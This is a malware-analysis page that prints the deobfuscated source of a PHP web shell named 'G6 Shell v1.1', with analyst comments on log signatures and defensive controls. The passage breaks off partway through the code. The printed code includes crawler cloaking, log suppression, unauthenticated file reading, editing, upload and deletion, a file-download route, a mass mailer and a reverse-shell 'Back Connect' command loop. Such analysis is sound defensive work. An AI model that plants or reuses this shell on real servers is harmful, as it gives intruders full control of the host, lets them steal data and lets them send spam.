PHP Malware Analysis

logo-ribbon.php

md5: 1270c73f8ecb757a9381d68712b23913


Screenshot


Attributes

Emails

Environment

Execution

Files

Input

Title

URLs
  • http://localhost/uploads/logo-ribbon.php (Traces)
  • http://www.dnsstuff.com/tools?runFromMain= (Deobfuscated, Original)
  • http://www.dnsstuff.com/tools?runFromMain=::1& (HTML)
  • http://www.exploit-db.com/search/?action=search& (HTML)
  • http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description= (Deobfuscated, Original)
  • http://www.who.is/whois/ (Deobfuscated, Original)
  • http://www.who.is/whois/localhost (HTML)


Deobfuscated PHP code

<style stype="text/css">
.flink{font-weight:normal;}
body{background-color:#101010;  background:#101010;color:#f2f2f2;font-family:tahoma;font-size:12px;}
body a{ color:#3467BA;font-weight:bold;text-decoration:none;}
body a:hover{text-decoration:underline;}
#main_content{border:1px solid #5C7296;overflow:hidden;width:1000px;height:auto;padding:15px;margin: 0 auto;background:#0A0A0A;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
.enabled{color:#7ACC29;}
.enabled a{color:#7ACC29;font-weight:normal;}
.disabled{color:#CC0000;}
.execbox{width:250px;padding: 5px 15px 15px 15px;height:auto;border:solid 1px #47A3FF;background:#0A0A0A;}
.viewsource{border:solid 1px #47A3FF;background:#0A0A0A;color:#f2f2f2;}
.command{width:620px;border:solid 1px #47A3FF;outline:none;background:#0A0A0A;color:#f2f2f2;}
.response{width:616px;color:green;height:300px;border-bottom:solid 1px #47A3FF;border-right:solid 1px #47A3FF;border-left:solid 1px #47A3FF;border-top:0;outline:none;background:#0A0A0A;color:#f2f2f2;margin:-4px 0px 0px 0px;}
.TableHeader_Name{width:450px;padding:0px 0px 0px 5px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-left-radius:4px;-moz-border-top-left-radius:4px;-webkit-border-top-left-radius:4px;}
.TableHeader{width:100px;height:25px;font-weight:bold;font-family:verdana;text-align:center;background-color:#282828;}
.TableHeaderoptions{padding:0px 0px 0px 15px;width:170px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;}
.filesize{color:green;text-align:center;}
.filenames a{font-weight:normal;text-decoration:none;}
.filenames a:hover{text-decoration:underline;}
tr{background-color: #080808;}
tr:hover{background-color:#282828;}
#options{font-weight:200;font-family:tahoma;margin-left:10px;display:block;}
#title{font-size:25px;font-weight:bold;font-family:arial;display:block;padding:15px 0px 0px 0px;}
.Logo{font-size:150px;text-align:center;color:#101010;}
.logotext{font-size:20px;text-align:center;color:#101010;}
.terminaltop{background-color:#686868;margin:-10px 0px -3px 0px;width:622px;height:20px;border-top-right-radius:5px;-moz-border-top-right-radius:5px;-webkit-border-top-right-radius:5px;border-top-left-radius:5px;-moz-border-top-left-radius:5px;-webkit-border-top-left-radius:5px;}
.TableHeaderoptions2{padding:0px 0px 0px 15px;width:170px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;}
.box{padding:10px;background-color:#292929;border:1px solid #3467BA;height:auto;width:970;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
.box2{padding:5px;background-color:#000000;height:auto;width:970;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
.optionstr td{background-color:#0A0A0A;}
.optionstr td:hover{background-color:#0A0A0A;}
.chdir{background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;}
.godir{margin:0px 10px 0px -5px;background-color:#292929;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;width:24px;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px;}
</style>
<body>
        <div id="main_content">
<?php 
// Analyst note: start-up prelude. Everything here runs on every request,
// before any feature route is chosen.
ob_start();
// Hide PHP errors from the response and lift the memory limit.
ini_set('display_errors', false);
ini_set('memory_limit', '-1');
// Cloaking: a request whose User-Agent contains "Google" gets a bare 404 and
// nothing else, so the file looks absent to that crawler. When checking whether
// a suspect URL is live, do not rely on a crawler-style User-Agent.
if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
// Anti-forensics: clears the error_log target, switches log_errors off and
// removes the execution time limit. The leading @ also silences any warning
// from ini_set itself, so errors raised by the shell are not expected to reach
// the PHP error log; web-server access logs remain the main record.
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
// Fixed page title; the literal "G6 Shell v1.1" is a usable content signature.
echo "<title>G6 Shell v1.1 - Private .::Made By Mr. P-teo::.</title>";
/*
 * Analyst note: prints the banner shown at the top of most routes.
 *
 * It discloses the server name, server IP, the script's own filesystem path
 * ("Shell Location") and the server software string, all read from $_SERVER
 * and concatenated into the HTML without escaping.
 * It also builds three outbound links (who.is, dnsstuff.com, exploit-db.com)
 * that carry the Host header, server IP and software banner in their URLs;
 * following one sends those values to the third-party site.
 * Takes no parameters and returns nothing; output only.
 */
function get_srv_info()
{
    echo "<br /><span id='title'>G6 Shell v1.1 - Private</span><br /><div class='box'><b>Server Name: </b>" . $_SERVER["SERVER_NAME"] . "<br />\r\n        <b>Server IP: </b>" . $_SERVER["SERVER_ADDR"] . " <span class='enabled'><a href='http://www.who.is/whois/" . $_SERVER['HTTP_HOST'] . "' target='_blank'>[WHOIS]</a> - <a href='http://www.dnsstuff.com/tools?runFromMain=" . $_SERVER["SERVER_ADDR"] . "&toolType=traceroute' target='_blank'>[TRACEROUTE]</a></span><br />" . "<b>Shell Location: </b>" . $_SERVER["SCRIPT_FILENAME"] . "<br />\r\n        <b>Server Software: </b>" . $_SERVER["SERVER_SOFTWARE"] . " <span class='enabled'><a href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=" . $_SERVER['SERVER_SOFTWARE'] . "&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=' target='_blank'>[Exploit DB]</a></span><br />\r\n        </div><br /><br /><p></p>";
}
/*
 * Analyst note: chooses which PHP command-execution function the "Terminal"
 * route uses. Returns one of "exec", "passthru", "system" or "none".
 *
 * The intent appears to be honouring php.ini's disable_functions, but the
 * check as written does not test that list: the loop reads $diabled, which is
 * never assigned (the list was stored in $disabled), and every in_array() call
 * passes the array first and the function name second, the reverse of
 * in_array(needle, haystack).
 * NOTE(review): the runtime outcome depends on the PHP version; confirm in a
 * sandbox before using this function's result to scope an incident.
 */
function cmd()
{
    // disable_functions is split on ", " (comma plus space) only.
    $disabled = explode(', ', ini_get('disable_functions'));
    $diabledLower = array();
    // Iterates $diabled, not $disabled, so $diabledLower stays empty.
    foreach ($diabled as $function) {
        $diabledLower[] = strtolower($function);
    }
    // Preference order: exec, then passthru, then system.
    if (!in_array($diabledLower, "exec")) {
        return "exec";
    } elseif (!in_array($diabledLower, "passthru")) {
        return "passthru";
    } elseif (!in_array($diabledLower, "system")) {
        return "system";
    } else {
        return "none";
    }
}
// Analyst note: request parameters and navigation table.
// No password, token or source-address check appears in the visible code before
// this point or in the dispatcher that follows: whoever can request the file
// can use every route.
$shellVersion = "1.1";
// The opaque-looking keys are Base64 of plain feature names:
// "dXBsb2Fk" = "upload", "ZG93bg" = "down", "ZmlsZV9leHBsb3Jlcg" =
// "file_explorer", "bWtkaXI" = "mkdir". They are fixed strings, which makes
// them practical search terms in web-server access logs.
$upload = $_GET['dXBsb2Fk'];
$downloadfilename = $_GET['ZG93bg'];
$delete = $_GET['delete'];
$file_explorer = $_GET['ZmlsZV9leHBsb3Jlcg'];
$mkdir = $_GET['bWtkaXI'];
$currentDirectoryFileDl = $_GET['downlfile'];
// Menu of routes. Further tokens decode as "c3J2aW5mbw" = "srvinfo",
// "dGVybWlhbmw" = "termianl" (sic), "aGk" = "hi", "YmNrbmV0" = "bcknet",
// "a253aXN1ZQ" = "knwisue"; "eval", "kueqymass" and "srmve" are used as-is.
$NavLinks = array(array("name" => "Main", "url" => "?"), array("name" => "Server Information", "url" => "?c3J2aW5mbw="), array("name" => "File Explorer", "url" => "?ZmlsZV9leHBsb3Jlcg=/var/www/html/"), array("name" => "Terminal", "url" => "?dGVybWlhbmw"), array("name" => "Hash Identifier", "url" => "?aGk="), array("name" => "PHP Exec", "url" => "?eval"), array("name" => "Back Connect", "url" => "?YmNrbmV0="), array("name" => "Mass Mailer", "url" => "?kueqymass"), array("name" => "Shell-101", "url" => "?a253aXN1ZQ"), array("name" => "Self Remove", "url" => "?srmve"));
// Built from the client-supplied Host header plus REQUEST_URI. The dispatcher
// matches route tokens with strstr() anywhere in this string, so a token in any
// part of the URL selects the route.
$CurrentUrl = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$last = count($NavLinks) - 1;
// Prints the menu as "name / " links. $linknames and $linkurls are computed
// on each pass but not read anywhere in the visible code.
foreach ($NavLinks as $NavLink => $NavRow) {
    $linknames = $NavLink == 0;
    $linkurls = $NavLink == $last;
    echo '<a href="' . $NavRow['url'] . '">' . $NavRow['name'] . '</a> / ';
}
// Analyst note: file viewer/editor route (URL contains "readfile").
// The path is taken from $_REQUEST['readfile'] and nothing in this branch
// restricts it to a directory, so the reachable files are bounded only by the
// filesystem permissions of the PHP process.
if (strstr($CurrentUrl, "readfile")) {
    $sourcefile = $_REQUEST['readfile'];
    if (is_file($sourcefile)) {
        get_srv_info();
        if (isset($sourcefile)) {
            // Read primitive: the whole file is loaded and shown in a textarea.
            // The content goes through htmlentities(); the path and the Referer
            // header are echoed raw.
            $Finalsource = file_get_contents($sourcefile);
            echo "<strong>Editing: </strong>" . $sourcefile . "<br /><br /><a href='" . $_SERVER['HTTP_REFERER'] . "'>&laquo; Back to files</a><br /><form action='' method='POST'><textarea name='sourcecode' class='viewsource' rows='20' cols='121'>" . htmlentities($Finalsource) . "</textarea><br /><input type='Submit' value='Save File' name='save' /></form>";
        }
    } else {
        echo "Data not sent.";
    }
    // Write primitive: a POST carrying "save" overwrites $sourcefile with the
    // posted "sourcecode" value. This sits outside the is_file() check above.
    // On disk, the trace of this handler is an unexpected content or mtime
    // change on a file the web-server user can write; file-integrity
    // monitoring of the web root is the matching control.
    if (isset($_POST['save'])) {
        $new_source = $_POST['sourcecode'];
        $source_edit = fopen($sourcefile, 'w');
        fwrite($source_edit, $new_source);
        fclose($source_edit);
    }
} elseif (strstr($CurrentUrl, "aGk")) {
    // Analyst note: "Hash Identifier" route. It labels a posted string by its
    // length and, for some lengths, a marker substring. Nothing here touches
    // the filesystem or the network and nothing is cracked; the result is only
    // stored in $hashresult for the HTML that follows.
    get_srv_info();
    echo "<p>G6 hash identifier is able to identify MD5, SHA-1, MySQL5, DES(Unix), SHA-256, SHA-384, SHA-512, MD5(Unix), MD5(APR), MD5(phpBB3), MD5(Wordpress), SHA-256(Unix), SHA-512(Unix) and MD5(Base-64).</p>";
    if (isset($_POST['gethash'])) {
        $hash = $_POST['hash'];
        if (strlen($hash) == 32) {
            // "==" is a comparison, so this line assigns nothing.
            $hashresult == "MD5 Hash";
        } elseif (strlen($hash) == 40) {
            $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
        } elseif (strlen($hash) == 13) {
            $hashresult = "DES(Unix) Hash";
        } elseif (strlen($hash) == 16) {
            $hashresult = "MySQL Hash / /DES(Oracle Hash)";
        } elseif (strlen($hash) == 41) {
            // Looks at the character at offset 40, i.e. the last of 41.
            $GetHashChar = substr($hash, 40);
            if ($GetHashChar == "*") {
                $hashresult = "MySQL5 Hash";
            }
        } elseif (strlen($hash) == 64) {
            $hashresult = "SHA-256 Hash";
        } elseif (strlen($hash) == 96) {
            $hashresult = "SHA-384 Hash";
        } elseif (strlen($hash) == 128) {
            $hashresult = "SHA-512 Hash";
        } elseif (strlen($hash) == 34) {
            // First of three branches testing length 34; in an elseif chain
            // only this one can be entered, so the $H$ and $P$ tests are dead.
            if (strstr($hash, '$1$')) {
                $hashresult = "MD5(Unix) Hash";
            }
        } elseif (strlen($hash) == 37) {
            if (strstr($hash, '$apr1$')) {
                $hashresult = "MD5(APR) Hash";
            }
        } elseif (strlen($hash) == 34) {
            if (strstr($hash, '$H$')) {
                $hashresult = "MD5(phpBB3) Hash";
            }
        } elseif (strlen($hash) == 34) {
            if (strstr($hash, '$P$')) {
                $hashresult = "MD5(Wordpress) Hash";
            }
        } elseif (strlen($hash) == 39) {
            // Same pattern for length 39: the $6$ branch below is unreachable.
            if (strstr($hash, '$5$')) {
                $hashresult = "SHA-256(Unix) Hash";
            }
        } elseif (strlen($hash) == 39) {
            if (strstr($hash, '$6$')) {
                $hashresult = "SHA-512(Unix) Hash";
            }
        } elseif (strlen($hash) == 24) {
            if (strstr($hash, '==')) {
                $hashresult = "MD5(Base-64) Hash";
            }
        } else {
            $hashresult = "Hash type not found";
        }
    } else {
        $hashresult = "Not Hash Entered";
    }
    ?>
        <center>
                <form action="" method="POST"><table><tr class="optionstr"><td>Enter Hash:</td> <td><input type="text" name="hash" class="command" /></td><td><input type="submit" name="gethash" value="Identify Hash" /></td></tr><tr class="optionstr"><td>Result: </td><td><?php 
    echo $hashresult;
    ?></td></tr></table></form>
        </center>
       
        <?php 
} elseif (strstr($CurrentUrl, "YmNrbmV0")) {
    // Analyst note: "Back Connect" route, a reverse shell. On POST "bind" the
    // web server opens an outbound TCP connection to the ip/port taken from the
    // form, then executes whatever lines arrive on that socket.
    // What to look for: an outbound session from the PHP / web-server process
    // to an arbitrary address and port, and shell children of that process
    // (the code runs "pwd", "uname -a" and "time" before the command loop).
    // Controls that cut this path: egress filtering on the web tier, and
    // shell_exec / fsockopen in disable_functions where the application allows.
    get_srv_info();
    echo "\r\n<div id=\"back\">\r\n           <h2>Back Connect</h2>\r\n           <p>Back connect will allow you to enter system commands remotely.</p>\r\n           <p>\r\n           <table>\r\n                                <form action=\"\" method=\"post\">\r\n                                <tr class=\"optionstr\"><td>IP Address: </td><td><input type=\"textbox\" name=\"ip\" style=\"border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;\"></td></tr>\r\n                                <tr class=\"optionstr\"><td>Port: </td><td><input type=\"textbox\" name=\"port\" style=\"border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;\"></td></tr>\r\n                                <tr class=\"optionstr\"><td><input type=\"submit\" name=\"bind\" value=\"Open Connection\" style=\"border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;\"></td></tr>\r\n                                </form>\r\n                                </table>";
    if (isset($_POST['bind'])) {
        echo "<p>Attempting Connection...</p>";
        // Destination is entirely request-controlled.
        $ip = $_POST['ip'];
        $port = $_POST['port'];
        $sockfd = fsockopen($ip, $port, $errno, $errstr);
        if ($errno != 0) {
            echo "<font color='red'><b>{$errno}</b> : {$errstr}</font>";
        } else {
            if (!$sockfd) {
                $result = "<p>Unexpected error has occured, connection may have failed.</p>";
            } else {
                // Banner sent over the socket; its text is a network-level
                // signature if the session is captured in cleartext.
                fputs($sockfd, "\n{################################################################}\n..:: G6 W3b Sh3ll v1.1- Coded By Mr. P-teo ::..\n\n=> Backconnect \n=> Back        \n\r\n                                                         \n{################################################################}");
                $pwd = shell_exec("pwd");
                $sysinfo = shell_exec("uname -a");
                $time = Shell_exec("time");
                $len = 1337;
                fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
                // Command loop: runs until the remote end closes the socket.
                // The HTTP request that started it stays open for that long
                // (max_execution_time was set to 0 at start-up), so a very
                // long-lived request to this script is itself an indicator.
                while (!feof($sockfd)) {
                    $cmdPrompt = '[G6]#:> ';
                    fputs($sockfd, $cmdPrompt);
                    $command = fgets($sockfd, $len);
                    fputs($sockfd, "\n" . shell_exec($command) . "\n\n");
                }
                fclose($sockfd);
            }
        }
    }
    echo "</p></div>";
} elseif (strstr($CurrentUrl, "bWtmbA")) {
    // Analyst note: "make file" route ("bWtmbA" is Base64 of "mkfl"). It is
    // not listed in $NavLinks; the only link to it in this file sits inside an
    // HTML comment in the file-explorer header.
    get_srv_info();
    echo "<p>If no file path is included it will be created within the same directory as the shell.</p><form action='' method='post'><p>Filename: <input type='text' name='newfilename' /></p><p><input type='submit' value='Create File' name='create' /></p></form>";
    // htmlentities() is the only processing applied to the posted name;
    // no check on the directory or extension is made here.
    $newfilename = htmlentities($_POST['newfilename']);
    if (isset($_POST['create'])) {
        $ourFileName = $newfilename;
        // Mode 'w' creates the file, or truncates it to zero length if it
        // already exists.
        $ourFileHandle = fopen($ourFileName, 'w') or die("can't open file");
        fclose($ourFileHandle);
    }
    echo "<br /><br />";
} elseif (strstr($CurrentUrl, "bWtkaXI")) {
    // Analyst note: "make directory" route ("bWtkaXI" is Base64 of "mkdir").
    get_srv_info();
    echo "<p>If no file path is included directory will be created within the same directory as the shell.</p>\r\n                <form action='' method='post'>\r\n                <p>Directory Name: <input type='text' name='newdirname' /></p>\r\n                <p><input type='submit' value='Create New Directory' name='createdir' /></p>\r\n                </form>";
    $newdirname = htmlentities($_POST['newdirname']);
    if (isset($_POST['createdir'])) {
        $ourdirName = $newdirname;
        // Requested mode is 0777 (subject to the process umask). A new
        // directory with that mode under the web root is worth flagging
        // during clean-up.
        mkdir($ourdirName, 0777);
        // Printed without checking mkdir()'s return value.
        echo "Directory Created!";
    }
    echo "\r\n                <br /><br />";
} elseif (strstr($CurrentUrl, "ZmlsZV9leHBsb3Jlcg")) {
    // Analyst note: "File Explorer" route header. $file_explorer is the raw
    // value of the "ZmlsZV9leHBsb3Jlcg" query parameter; it is echoed into the
    // form and the links below without escaping.
    get_srv_info();
    $upload = $file_explorer;
    echo '<p><form action="" method="POST"><table><tr class="optionstr"><td><input class="chdir" type="text" name="chdir" value="' . $file_explorer . '"" /></td><td></td></form><td><div id="options"><a href="' . $CurrentUrl . '">Refresh Files</a></div></td><td><div id="options"><!--<a href="?bWtkaXI=' . $file_explorer . '">Make Directory</a> | <a href="?bWtmbA=' . $file_explorer . '">Make File</a> | <a href="?dXBsb2Fk=' . $upload . '">Upload</a></div>--></td></tr>';
    // Change-directory handler: redirects to the explorer route for the posted
    // path. The form echoed above contains no control named "godir".
    if (isset($_POST['godir'])) {
        $mandircha = $_POST['chdir'];
        if ($mandircha) {
            header("Location: ?ZmlsZV9leHBsb3Jlcg=" . $_POST['chdir']);
        }
    }
    ?>
        </div></p>
                        <table class="FileBrowserTable"><tr><td class="TableHeader_Name"> FileName's</td><td class="TableHeader">Filetype</a></td><td class="TableHeader">Size</td><td class="TableHeader">Permisions</td><td class="TableHeader">Last Modified</td><td class="TableHeaderoptions"> Options</td></tr>
                <?php 
    $Shell_Directory = $_SERVER['REMOTE_DIR'];
    //load files...
    /*
     * Analyst note: display helper for the file listing.
     * Returns the text after the last "." in $file when $file is not a
     * directory, and the string "Directory" when it is a directory or when
     * the path contains no "." at all. The "." test is made on the whole
     * path string passed in, not only on the final component.
     */
    function GetFileType($file)
    {
        if (!is_dir($file)) {
            if (strstr($file, ".")) {
                $FileExt = end(explode(".", $file));
                return $FileExt;
            } else {
                return "Directory";
            }
        } else {
            // $Directory is assigned but not used.
            $Directory = "Directory";
            return "Directory";
        }
    }
    /*
     * Analyst note: display helper for the file listing.
     * Returns the size of $file divided by 1024 and rounded to two decimals,
     * followed by " Kb"; returns "Not Availible" for directories.
     */
    function GetFileSize($file)
    {
        if (!is_dir($file)) {
            return round(filesize($file) / 1024, 2) . " Kb";
        } else {
            return "Not Availible";
        }
    }
    /*
     * Analyst note: display helper for the file listing.
     * Returns the modification time of $file formatted as m/d/y and wrapped in
     * a <center> element.
     */
    function LastModified($file)
    {
        return "<center>" . date("m/d/y", filemtime($file)) . "</center>";
    }
    /*
     * Analyst note: display helper for the file listing.
     * Reports what the PHP process itself can do with $file, using
     * is_readable / is_writable / is_executable, as "r--w--x" with "?" in
     * place of each capability that is missing. It does not show the mode
     * bits or owner. Returns the string wrapped in a <center> element, with
     * an inline colour when all three checks pass.
     */
    function permissions($file)
    {
        if (is_readable($file)) {
            $readable = "r";
        } else {
            $readable = "?";
        }
        if (is_writable($file)) {
            $writable = "w";
        } else {
            $writable = "?";
        }
        if (is_executable($file)) {
            $executable = "x";
        } else {
            $executable = "?";
        }
        if ($readable . "--" . $writable . "--" . $executable == "r--w--x") {
            return "<center style='color:#f1f1f1;'>" . $readable . "--" . $writable . "--" . $executable . "</center>";
        } else {
            return "<center>" . $readable . "--" . $writable . "--" . $executable . "</center>";
        }
    }
    // Analyst note: directory listing. scandir() runs on the raw
    // "ZmlsZV9leHBsb3Jlcg" query value, so any directory the PHP process can
    // read may be listed. Each row links to the other routes; the resulting
    // query strings ("ZmlsZV9leHBsb3Jlcg=", "readfile=", "delete=",
    // "downlfile=" followed by a filesystem path) are what this activity looks
    // like in access logs. File names are written into the HTML unescaped.
    $Files = scandir($file_explorer);
    foreach ($Files as $File) {
        if ($File == "..") {
            $currentDirectory = $_GET['ZmlsZV9leHBsb3Jlcg'];
            //Up a directory
            // Parent link: the path is cut at its last "/".
            $currentDirectory = substr($currentDirectory, 0, strrpos($currentDirectory, "/"));
            echo "<tr><td><a href='?ZmlsZV9leHBsb3Jlcg=" . $currentDirectory . "'>" . $File . "</a></td><td></td><td></td><td></td><td></td><td></td></tr>";
        } elseif ($File == ".") {
            //Same as current Dir, no need for this...
        } else {
            $currentDirectory = $_GET['ZmlsZV9leHBsb3Jlcg'];
            $type = GetFileType($currentDirectory . "/" . $File);
            if ($type == "Directory") {
                // Directory row: a single link back into the explorer route.
                echo "<tr><td><a class='flink' title='Explore Directory' href='?ZmlsZV9leHBsb3Jlcg=" . $currentDirectory . "/" . $File . "'>" . $File . "/</a></td><td><center>" . $type . "</center></td><td class='filesize'>" . GetFileSize($currentDirectory . "/" . $File) . "</td><td style='color:red;'>" . permissions($currentDirectory . "/" . $File) . "</td><td>" . LastModified($currentDirectory . "/" . $File) . "</td><td>Not Availible</td></tr>";
            } else {
                // File row: E = edit (readfile), B = delete, D = download.
                echo "<tr><td><a class='flink' title='Edit File' href='?readfile=" . $currentDirectory . "/" . $File . "'>" . $File . "</a></td><td><center>" . $type . "</center></td><td class='filesize'>" . GetFileSize($currentDirectory . "/" . $File) . "</td><td style='color:red;'>" . permissions($currentDirectory . "/" . $File) . "</td><td>" . LastModified($currentDirectory . "/" . $File) . "</td><td><a href='?readfile=" . $currentDirectory . "/" . $File . "' title='Edit File'>E</a> - <a href='?delete=" . $currentDirectory . "/" . $File . "' title='Bin the Document'>B</a> - <a href='?downlfile=" . $currentDirectory . "/" . $File . "&file=" . $File . "' title='Download File'>D</a></td></tr>";
            }
        }
    }
    ?>
</table>
<div style="background:#282828;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px;border-bottom-left-radius:4px;-moz-border-bottom-left-radius:4px;-webkit-border-bottom-left-radius:4px;height:25px;margin:0px 0px 10px 0px;width:1000px;" ></div>
        <div style="padding:10px;background-color: #292929;border: 1px solid #3467BA;border-radius: 6px;-moz-border-radius: 6px;-webkit-border-radius: 6px;width:220px;float:left;margin:10px 10px 15px 0px;">
        <h4>File Upload</h4><form action="" method="post" enctype="multipart/form-data"><input type="file" name="file" /><br /><input type="submit" name="upload" value="Upload File" /></form></div>
        <?php 
    // Analyst note: upload handler. The uploaded file is moved into the
    // directory named by the "ZmlsZV9leHBsb3Jlcg" query value under the
    // client-supplied file name; no type, extension or size check is made.
    // The success alert is printed without checking move_uploaded_file()'s
    // return value. On the defensive side this is the route by which further
    // files reach the host: new files in web-writable directories around the
    // time of multipart POSTs to this script should be collected and reviewed.
    if (isset($_POST['upload'])) {
        if (isset($_FILES['file'])) {
            move_uploaded_file($_FILES["file"]["tmp_name"], $file_explorer . "/" . $_FILES["file"]["name"]);
            echo "<script>alert(\"File successfully uploaded, enjoy.\");</script>";
        }
    }
    ?>
        <div style="padding:10px;background-color: #292929;border: 1px solid #3467BA;border-radius: 6px;-moz-border-radius: 6px;-webkit-border-radius: 6px;width:220px;float:left;margin:10px 10px 15px 0px;">
        <h4>Create Directory</h4>
        <form action="" method="post"><input type="text" name="dirname" /><br /><input type="submit" name="createdir" value="Create Dir" /></form></div>
        <?php 
    // Analyst note: create-directory handler of the explorer page. The new
    // directory is $file_explorer . "/" . the posted "dirname", both taken
    // from the request as-is. The mode is written as decimal 777, unlike the
    // octal 0777 used by the other mkdir() call in this file, so the resulting
    // permission bits are not rwxrwxrwx. On failure the script dies and prints
    // the attempted path.
    if (isset($_POST['createdir'])) {
        if (strlen($_POST['dirname']) > 0) {
            mkdir($file_explorer . "/" . $_POST['dirname'], 777) or die($file_explorer . "/" . $_POST['dirname']);
        }
    }
    ?>
                <br /><br /><br />
<?php 
} elseif (strstr($CurrentUrl, "downlfile")) {
    // Analyst note: download route, the exfiltration primitive. The file
    // path is the raw "downlfile" query value ($currentDirectoryFileDl) and the
    // suggested save name is the raw "file" query value.
    // NOTE(review): forceDL() is called before its definition, and that
    // definition sits inside this branch rather than at top level; confirm in
    // a sandbox whether this route actually runs before counting it in scoping.
    /*$type = mime_content_type($currentDirectoryFileDl);
      header('Content-Type: '.$type);
      header('Content-Disposition: attachment; filename="'.$currentDirectoryFileDl.'"');*/
    $file = $_GET['file'];
    // header('Content-Type: application/force-download'); Non-standard MIME-Type, incompatible with Samsung C3050 for example. Let it commented
    //readfile($currentDirectoryFileDl);
    forceDL($currentDirectoryFileDl, $file);
    /*
     * forceDL
     *
     * Forces the browser to download file
     *
     * @param string $filePath Path to the selected download
     * @param string $fileName Name of file to be saved, can be anything honestly
     */
    function forceDL($filePath, $fileName)
    {
        /* Rquired for IE */
        if (ini_get('zlib.output_compression')) {
            ini_set('zlib.output_compression', 'Off');
        }
        /*
        Files not downloading with correct headers?
        1) Open file in Notepad++ (or similar) and check for white-space or other code (php code)
        2) Extra code?
        3) Problem found.
        4) Profit
        Should answer most questions
        */
        /* Headers */
        // Response fingerprint: Content-Type "application/force-download" plus
        // an attachment disposition coming from a PHP script in an uploads
        // directory. $fileName is placed in the header without escaping.
        header('Pragma: public');
        header('Expires: 0');
        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
        header('Last-Modified: ' . gmdate('D, d M Y H:i:s', filemtime($filePath)) . ' GMT');
        header('Cache-Control: private', false);
        header('Content-Type: application/force-download');
        header('Content-disposition: attachment; filename="' . $fileName . '"');
        header('Content-Transfer-Encoding: binary');
        header('Content-length: ' . filesize($filePath));
        // Streams the file, then appends the path and name to the body, so the
        // bytes sent exceed the declared Content-length.
        readfile($filePath);
        echo $filePath . $fileName;
        exit;
    }
} elseif (strstr($CurrentUrl, "kueqymass")) {
    get_srv_info();
    ?>
                <strong>Mass Mailer</strong>
                <p>Be warned using the mass mailing feature may attract attention to your G6 shell. Seperate each email with <strong>;</strong></p>
                <form action="" method="post">
                        <table><tr><td>To Email(s): </td><td><input type="text" style="background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px; width:220px;" name="email" placeholder="email@address.com" /></tr><tr><td>Subject: </td>       <td><input type="text" style="background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;width:220px" name="subject" /></td></tr><tr><td>From Email: </td><td><input type="email" style="background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;width:220px;" name="fromEmail" placeholder="example@google.com" /></td></tr><tr><td>Message: </td><td></td></tr></table><table><tr><td><textarea style="background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px; height:200px;width:290px;" name="message"></textarea></td></tr><tr><td><input type="submit" name="send" value="Send Message(s)" /></td></tr></table></form>
                        <?php 
    // Analyst note: mass-mailer handler. Recipients are split on ";" and one
    // mail() call is made per address through the server's own mail transport,
    // with subject, body and the From header all taken from the POST as-is.
    // The From value is concatenated straight into the header string.
    // What to look for: bursts of outbound mail from the web-server account in
    // the MTA logs and queue, and, where PHP's mail.add_x_header is enabled,
    // this script's name in the X-PHP-Originating-Script header of the
    // messages. Spam sent this way is a common cause of the host's IP being
    // blocklisted.
    if (isset($_POST['send'])) {
        $email = $_POST['email'];
        $subject = $_POST['subject'];
        $from = $_POST['fromEmail'];
        $message = $_POST['message'];
        // All four fields must be non-empty for anything to be sent.
        if ($email && $subject && $from && $message) {
            $emails = explode(";", $email);
            foreach ($emails as $email) {
                mail($email, $subject, $message, "From: " . $from);
            }
        }
    }
} elseif (strstr($CurrentUrl, "delete")) {
    // Analyst note: delete route. $delete is the raw "delete" query value;
    // a file is removed with unlink(), a directory with rmdir(). The action
    // is triggered by a plain GET with no confirmation step, so a single
    // access-log line of the form "?delete=<path>" records each deletion and
    // can be used to list what must be restored.
    if (!is_dir($delete)) {
        unlink($delete);
    } else {
        rmdir($delete);
    }
    // Redirect target is the client-supplied Referer header.
    header("Location: " . $_SERVER['HTTP_REFERER']);
} elseif (strstr($CurrentUrl, "c3J2aW5mbw")) {
